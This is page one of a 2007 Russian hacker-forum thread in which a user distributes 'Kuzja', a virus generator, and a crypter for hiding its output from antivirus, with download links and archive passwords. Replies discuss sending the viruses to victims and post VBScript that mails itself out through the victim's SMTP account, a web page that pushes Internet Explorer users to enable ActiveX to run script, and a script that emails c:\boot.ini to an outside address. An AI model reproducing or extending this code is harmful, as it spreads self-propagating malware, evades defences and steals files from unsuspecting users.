Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Генератор Kuzja (https://forum.antichat.xyz/showthread.php?t=36437)

GROB_T 26.03.2007 21:25
Генератор Kuzja
 
Недавно создал тему о моем генераторе вирусов, но ее почему-то удалили, я так и не понял почему, решил создать еще раз. Я говорил, что в следующих версиях генератора будет возможность шифрования кода сгенерированного вируса. Я сделал прогу, которая сделана именно под мой генератор, она скрывает сгенерированные вирусы от антивирусов и глаз юзера, код при этом становится абсолютно нечитаемым. У сгенерированного вируса есть несколько недостатков:
1)Юзер может легко запасти, что делает вирус
2)не совсем недостаток, но вирус палит BitDefender.

У кпиптованного вируса все недостатки устранены, код вируса нелегко узнать, но ,конечно, если очень сильно захочется, то можно, но вряд-ли юзеру это надо, на вирустотале все молчит, никто ничего не вякает - это по-моему хорошо

скачать криптор
http://grob-t.narod.ru/KUZJA-CRYPTOR.rar

скачать сам генератор
http://grob-t.narod.ru/kuzja.rar

Пароль на оба архива grob-t.narod.ru

GROB_T 27.04.2007 01:29
Новая версия генератора - KUZJA 1.1, качать тут:
http://grob-t.narod.ru/Generator_KUZJA_v1.1.rar
пасс grob-t.narod.ru

Mo4x 27.04.2007 01:57
grob_t
Генератор ты иметь ввиду конструктор вирусов ?
Кстате залей на рапиду.сом если не влом.

GROB_T 28.04.2007 00:44
залил на рапиду _http://rapidshare.com/files/28264874/Generator_KUZJA_v1.1.rar.html

GROB_T 06.05.2007 14:02
http://kuzja-generator.ucoz.ru/_ld/0/2_KUZJA-CRYPTOR.rar - новая версия криптора, пароль на архив - 666, с прошлой версией у некоторых были проблеммы, в этой версии есть возможность выбора степени шифрования а так-же выводится диалог выбора файла и не надо его набивать вручную. Криптор написан на VBS, скомпилен прогой EXEScript 3.0

AtuM 06.05.2007 19:42
grob_t
На чем писал генератор?

GROB_T 06.05.2007 20:44
на delphi 9

у меня возникла идея переписать генератор, чтобы он генерил вирусы на VBScript, а не BAT-вирусы, появилось это решение оттого, что после того, как сгенерированные вири начнут палится, криптор сможет их скрывать, но в сгенеренном вирусе тот код, который не может выполнить bat-ник скидывается в vbs-файл, который потом выполняется. Если начнет палиться vbs-файл, то антивири запалят этот файл при запуске виря. Отписывайтесь здесь, одобряете ли вы это решение.

@ps1k 08.05.2007 02:34
делай коли время есть, а мы потом посмотрим

Petr 08.05.2007 04:08
Поясни что этот генератот делает

Ch3ck 08.05.2007 11:10
Цитата:
Поясни что этот генератот делает
Генерирует вирусы (программы шутки(может и не только шутки)).
Эх и люди пошли...

GROB_T 12.05.2007 13:48
Переделал генератор под создание vbs вирусов, правда из популярных антивирей палится вебом, но только если включать модуль автозагрузки, но конечно, для вирусов я сделал криптор, после крипта вирь со всеми настройками палится только одним антивирем, но не популярным, чета название забыл) ничего нового в генераторе нету, просто генератор полностью переделан под создание вирей на vbs, возможно где-нибудь могут возникнуть ошибки, если вы их обнаружите отписывайтесь здесь, тут www.kuzja-generator.ucoz.ru в гостевой книге или на форуме либо в асю 444452117 или на мыло grob_t@mail.ru.
скачать генератор KUZJA версии 1.2 - http://kuzja-generator.ucoz.ru/_ld/0/3_Generator_KUZJA.rar

Криптор вирусов - http://kuzja-generator.ucoz.ru/_ld/0/4_KUZJA-CRYPTOR.rar
Пароль на архивы - 666

если найдете ошибки, НЕ забывайте сообщить мне

zl0y 12.05.2007 15:45
Такие надписи меня просто убивают ;)
http://s.foto.radikal.ru/0705/e7/86ed927e9167.jpg

TrON 12.05.2007 16:15
ыыы))) не плохо))))ща попробую)

TrON 12.05.2007 16:21
качка нэ идет. даже на сайте регнулся, оттуда тоже нэ идет.

GROB_T 12.05.2007 16:35
Только что проверил, все качается, залил на рапиду http://rapidshare.com/files/30883736/3_Generator_KUZJA.rar.html - это сам генератор

http://rapidshare.com/files/30884009/4_KUZJA-CRYPTOR.rar.html - это криптор

Пароль на архивы - 666

TrON 12.05.2007 17:56
млин, извини, Flashget переглючило - все качаецца.
молодец +1 супер, ес че напиши как от него избавицца?

GROB_T 18.05.2007 23:26
Новая версия генератора 1.3a
Качать тут:

http://kuzja-generator.ucoz.ru/_ld/0/5_GeneratorKUZJAv.rar

пасс 666

Barney 18.05.2007 23:34
окуенно молодца работает на пять баллов!!!

_SploiT_ 19.05.2007 02:44
GROB_T
Новая сборка be cool))) +1

Jessy 19.05.2007 06:25
Занятная вещица..Надо будет протестить. Автору респект.

Crash2 19.05.2007 09:12
Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?

KaMiKadZe 19.05.2007 09:13
Цитата:
Сообщение от Crash2
Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?
Мда...Криптовать чтобы спрятать от антивирусов и прочих защитных программ...

Crash2 19.05.2007 09:46
А можно сделать так чтобы в вирусе использовать функции из двух подменю, например в подменю Сообщени я сделал чтобы окно вылазило например 50 раз, но ведь тот кто скачает и запустит вирус может зайти в процессы и завершить, хоть и в подменю есть функция Запретить диспечер задач, но при создании вируса исользуются функции одного подменю, поэтому прходиться создавать 2 вируса , один с сообщением, другой с Запрешением диспечера задач. И жертва врятли запустит сразу 2 файла.

Crash2 19.05.2007 12:07
Только что запустил эту программу с Запрешением диспечера задач, помогите исправить, срочно, комп где запустил не мой, перезагрузка непомогает, что делать?
При нажатии Ctrl+alt+delet наисано диспечер задач отключен администратором.

GROB_T 19.05.2007 13:36
2 Crash2: в генераторе будет включены все галки которые стоят во всех подменб, т.е. если ты поставишь галку на выводить сообщение и на запрещение диспетчера, все будет работать, вроде просто сначала сработает сообщение, а потом запрет диспетчера, потом поправлю

Crash2 19.05.2007 13:41
GROB_T Ок, уже разобрался, а новые версии будут?

С деспечером задач тоже справился, с помощью NexArmAor

GROB_T 19.05.2007 14:00
Будут новые версии, тока я уже не знаю, что можно в генератор добавить прикольного:) если кто-нить что может посоветовать, пишите тут, могу сделать функции червя с распространением через MS Outlook, тока позние версии не очень любят, когда к ним в адресную книжку кто-то хочет влезть и просят разрешение у юзера :( , вобщем если кто что знает, пишите тут.

NeXArmAor 19.05.2007 14:17
Есть код (на VBS) для рассылки через CDO (Collaboration Data Object) , не требует Outlook.

Barney 19.05.2007 14:32
гы один вопрос а как вернуть диспетчер задач?

GROB_T 19.05.2007 14:32
2 NeXArmAor, покажи, но кажись этот код используется на вкладке уведомление для отсылки письма автору виря

2 barney:
on error resume next
Set S = CreateObject("Wscript.Shell")
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disabletaskmgr","0","REG_D WORD"

это сохрани в vbs файл и запусти

NeXArmAor 19.05.2007 14:44
GROB_T
Цитата:
Set SH=CreateObject("wscript.shell")
Set ml = CreateObject("CDO.Message")
Set mlo = CreateObject("CDO.Configuration")
smtps=SH.regread("HKEY_CURRENT_USER\Software\Micro soft\Internet Account Manager\Accounts\00000001\SMTP Server")
mlfrom=SH.regread("HKEY_CURRENT_USER\Software\Micr osoft\Internet Account Manager\Accounts\00000001\SMTP Email Address")
Set mlc = mlo.Fields
Set ml.Configuration = mlo
mlc("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
mlc("http://schemas.microsoft.com/cdo/configuration/smtpserver") = smtps ' Здесь автоматически определяется SMTP сервер используемый на компьютере
mlc("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 0
mlc.Update
ml.to = "Получатель"
ml.from = mlfrom ' Здесь автоматически определяется от кого письмо,можно подставить другое
ml.subject = "Сабж письма"
ml.AddAttachment (wscript.scriptfullname) ' Аттач
ml.HTMLBody = "ХТМЛ боди или простой текст"
ml.send ' Отправка
SEt mlc = Nothing
SeT mlo = Nothing
SEt ml = Nothing

GROB_T 19.05.2007 14:58
спс, но этот код по-моему не будет пахать, так как на большинстве серваков нужна авторизация чтоб отправить почту, но возможно на каком нить серваке и будет пахать

helat 19.05.2007 15:23
а реально ли vbs вставить нв страницу (HTMl, PHP) ?
Кстати надо ещё прогу сделать которая всё назад вернёт.Или скрипт.

NeXArmAor 19.05.2007 15:37
helat , В HTML реально,на PHP не знаю. Но скрипт будет работать в таком случае только с IE. Другие браузеры не дружат с VBS.

helat 19.05.2007 15:42
КАК именно в html опиши плиз.

Barney 19.05.2007 15:45
Цитата:
Сообщение от helat
КАК именно в html опиши плиз.
http://www.compdoc.ru/internet/vbscript/vbscript/1.shtml

NeXArmAor 19.05.2007 15:48
helat,
Цитата:
<HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
On Error Resume Next
MsgBox "Чтобы посмотреть эту страницу" & vbCrLf & "Включите компонент ActiveX", vbInformation, "Уря"
Set shell=CreateObject("WScript.Shell")
If err.number=429 then
shell.Run javascript:location.reload()
else
--></script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR>< BR><BR><BR><font size="5">Бугогагагаа</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>

helat 19.05.2007 15:57
а файл куда вставить?

GROB_T 19.05.2007 16:14
<script language = "VBScript">
Тут текст скрипта
</script>

тока кстати, не будет пахать функция wscript.sleep

helat 19.05.2007 16:21
НЕПАШЕТ
написал
Код:
<HTML><BODY>
<script language = "VBScript">
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Set ww = CreateObject("WMPlayer.OCX.7")
Set cw = ww.cdromCollection
if cw.Count >= 1 then
For i = 0 to cw.Count - 1
cw.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "helats@gmail.com", "54027@mail.ru", "ВИРУС", "COPM ZARAZEN")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "54027"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing

</script>
</BODY></HTML>
<HTML><HEAD><TITLE></TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">ГГ</font><BR><font size="1"></font></CENTER></BODY></HTML>


Время: 10:03
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице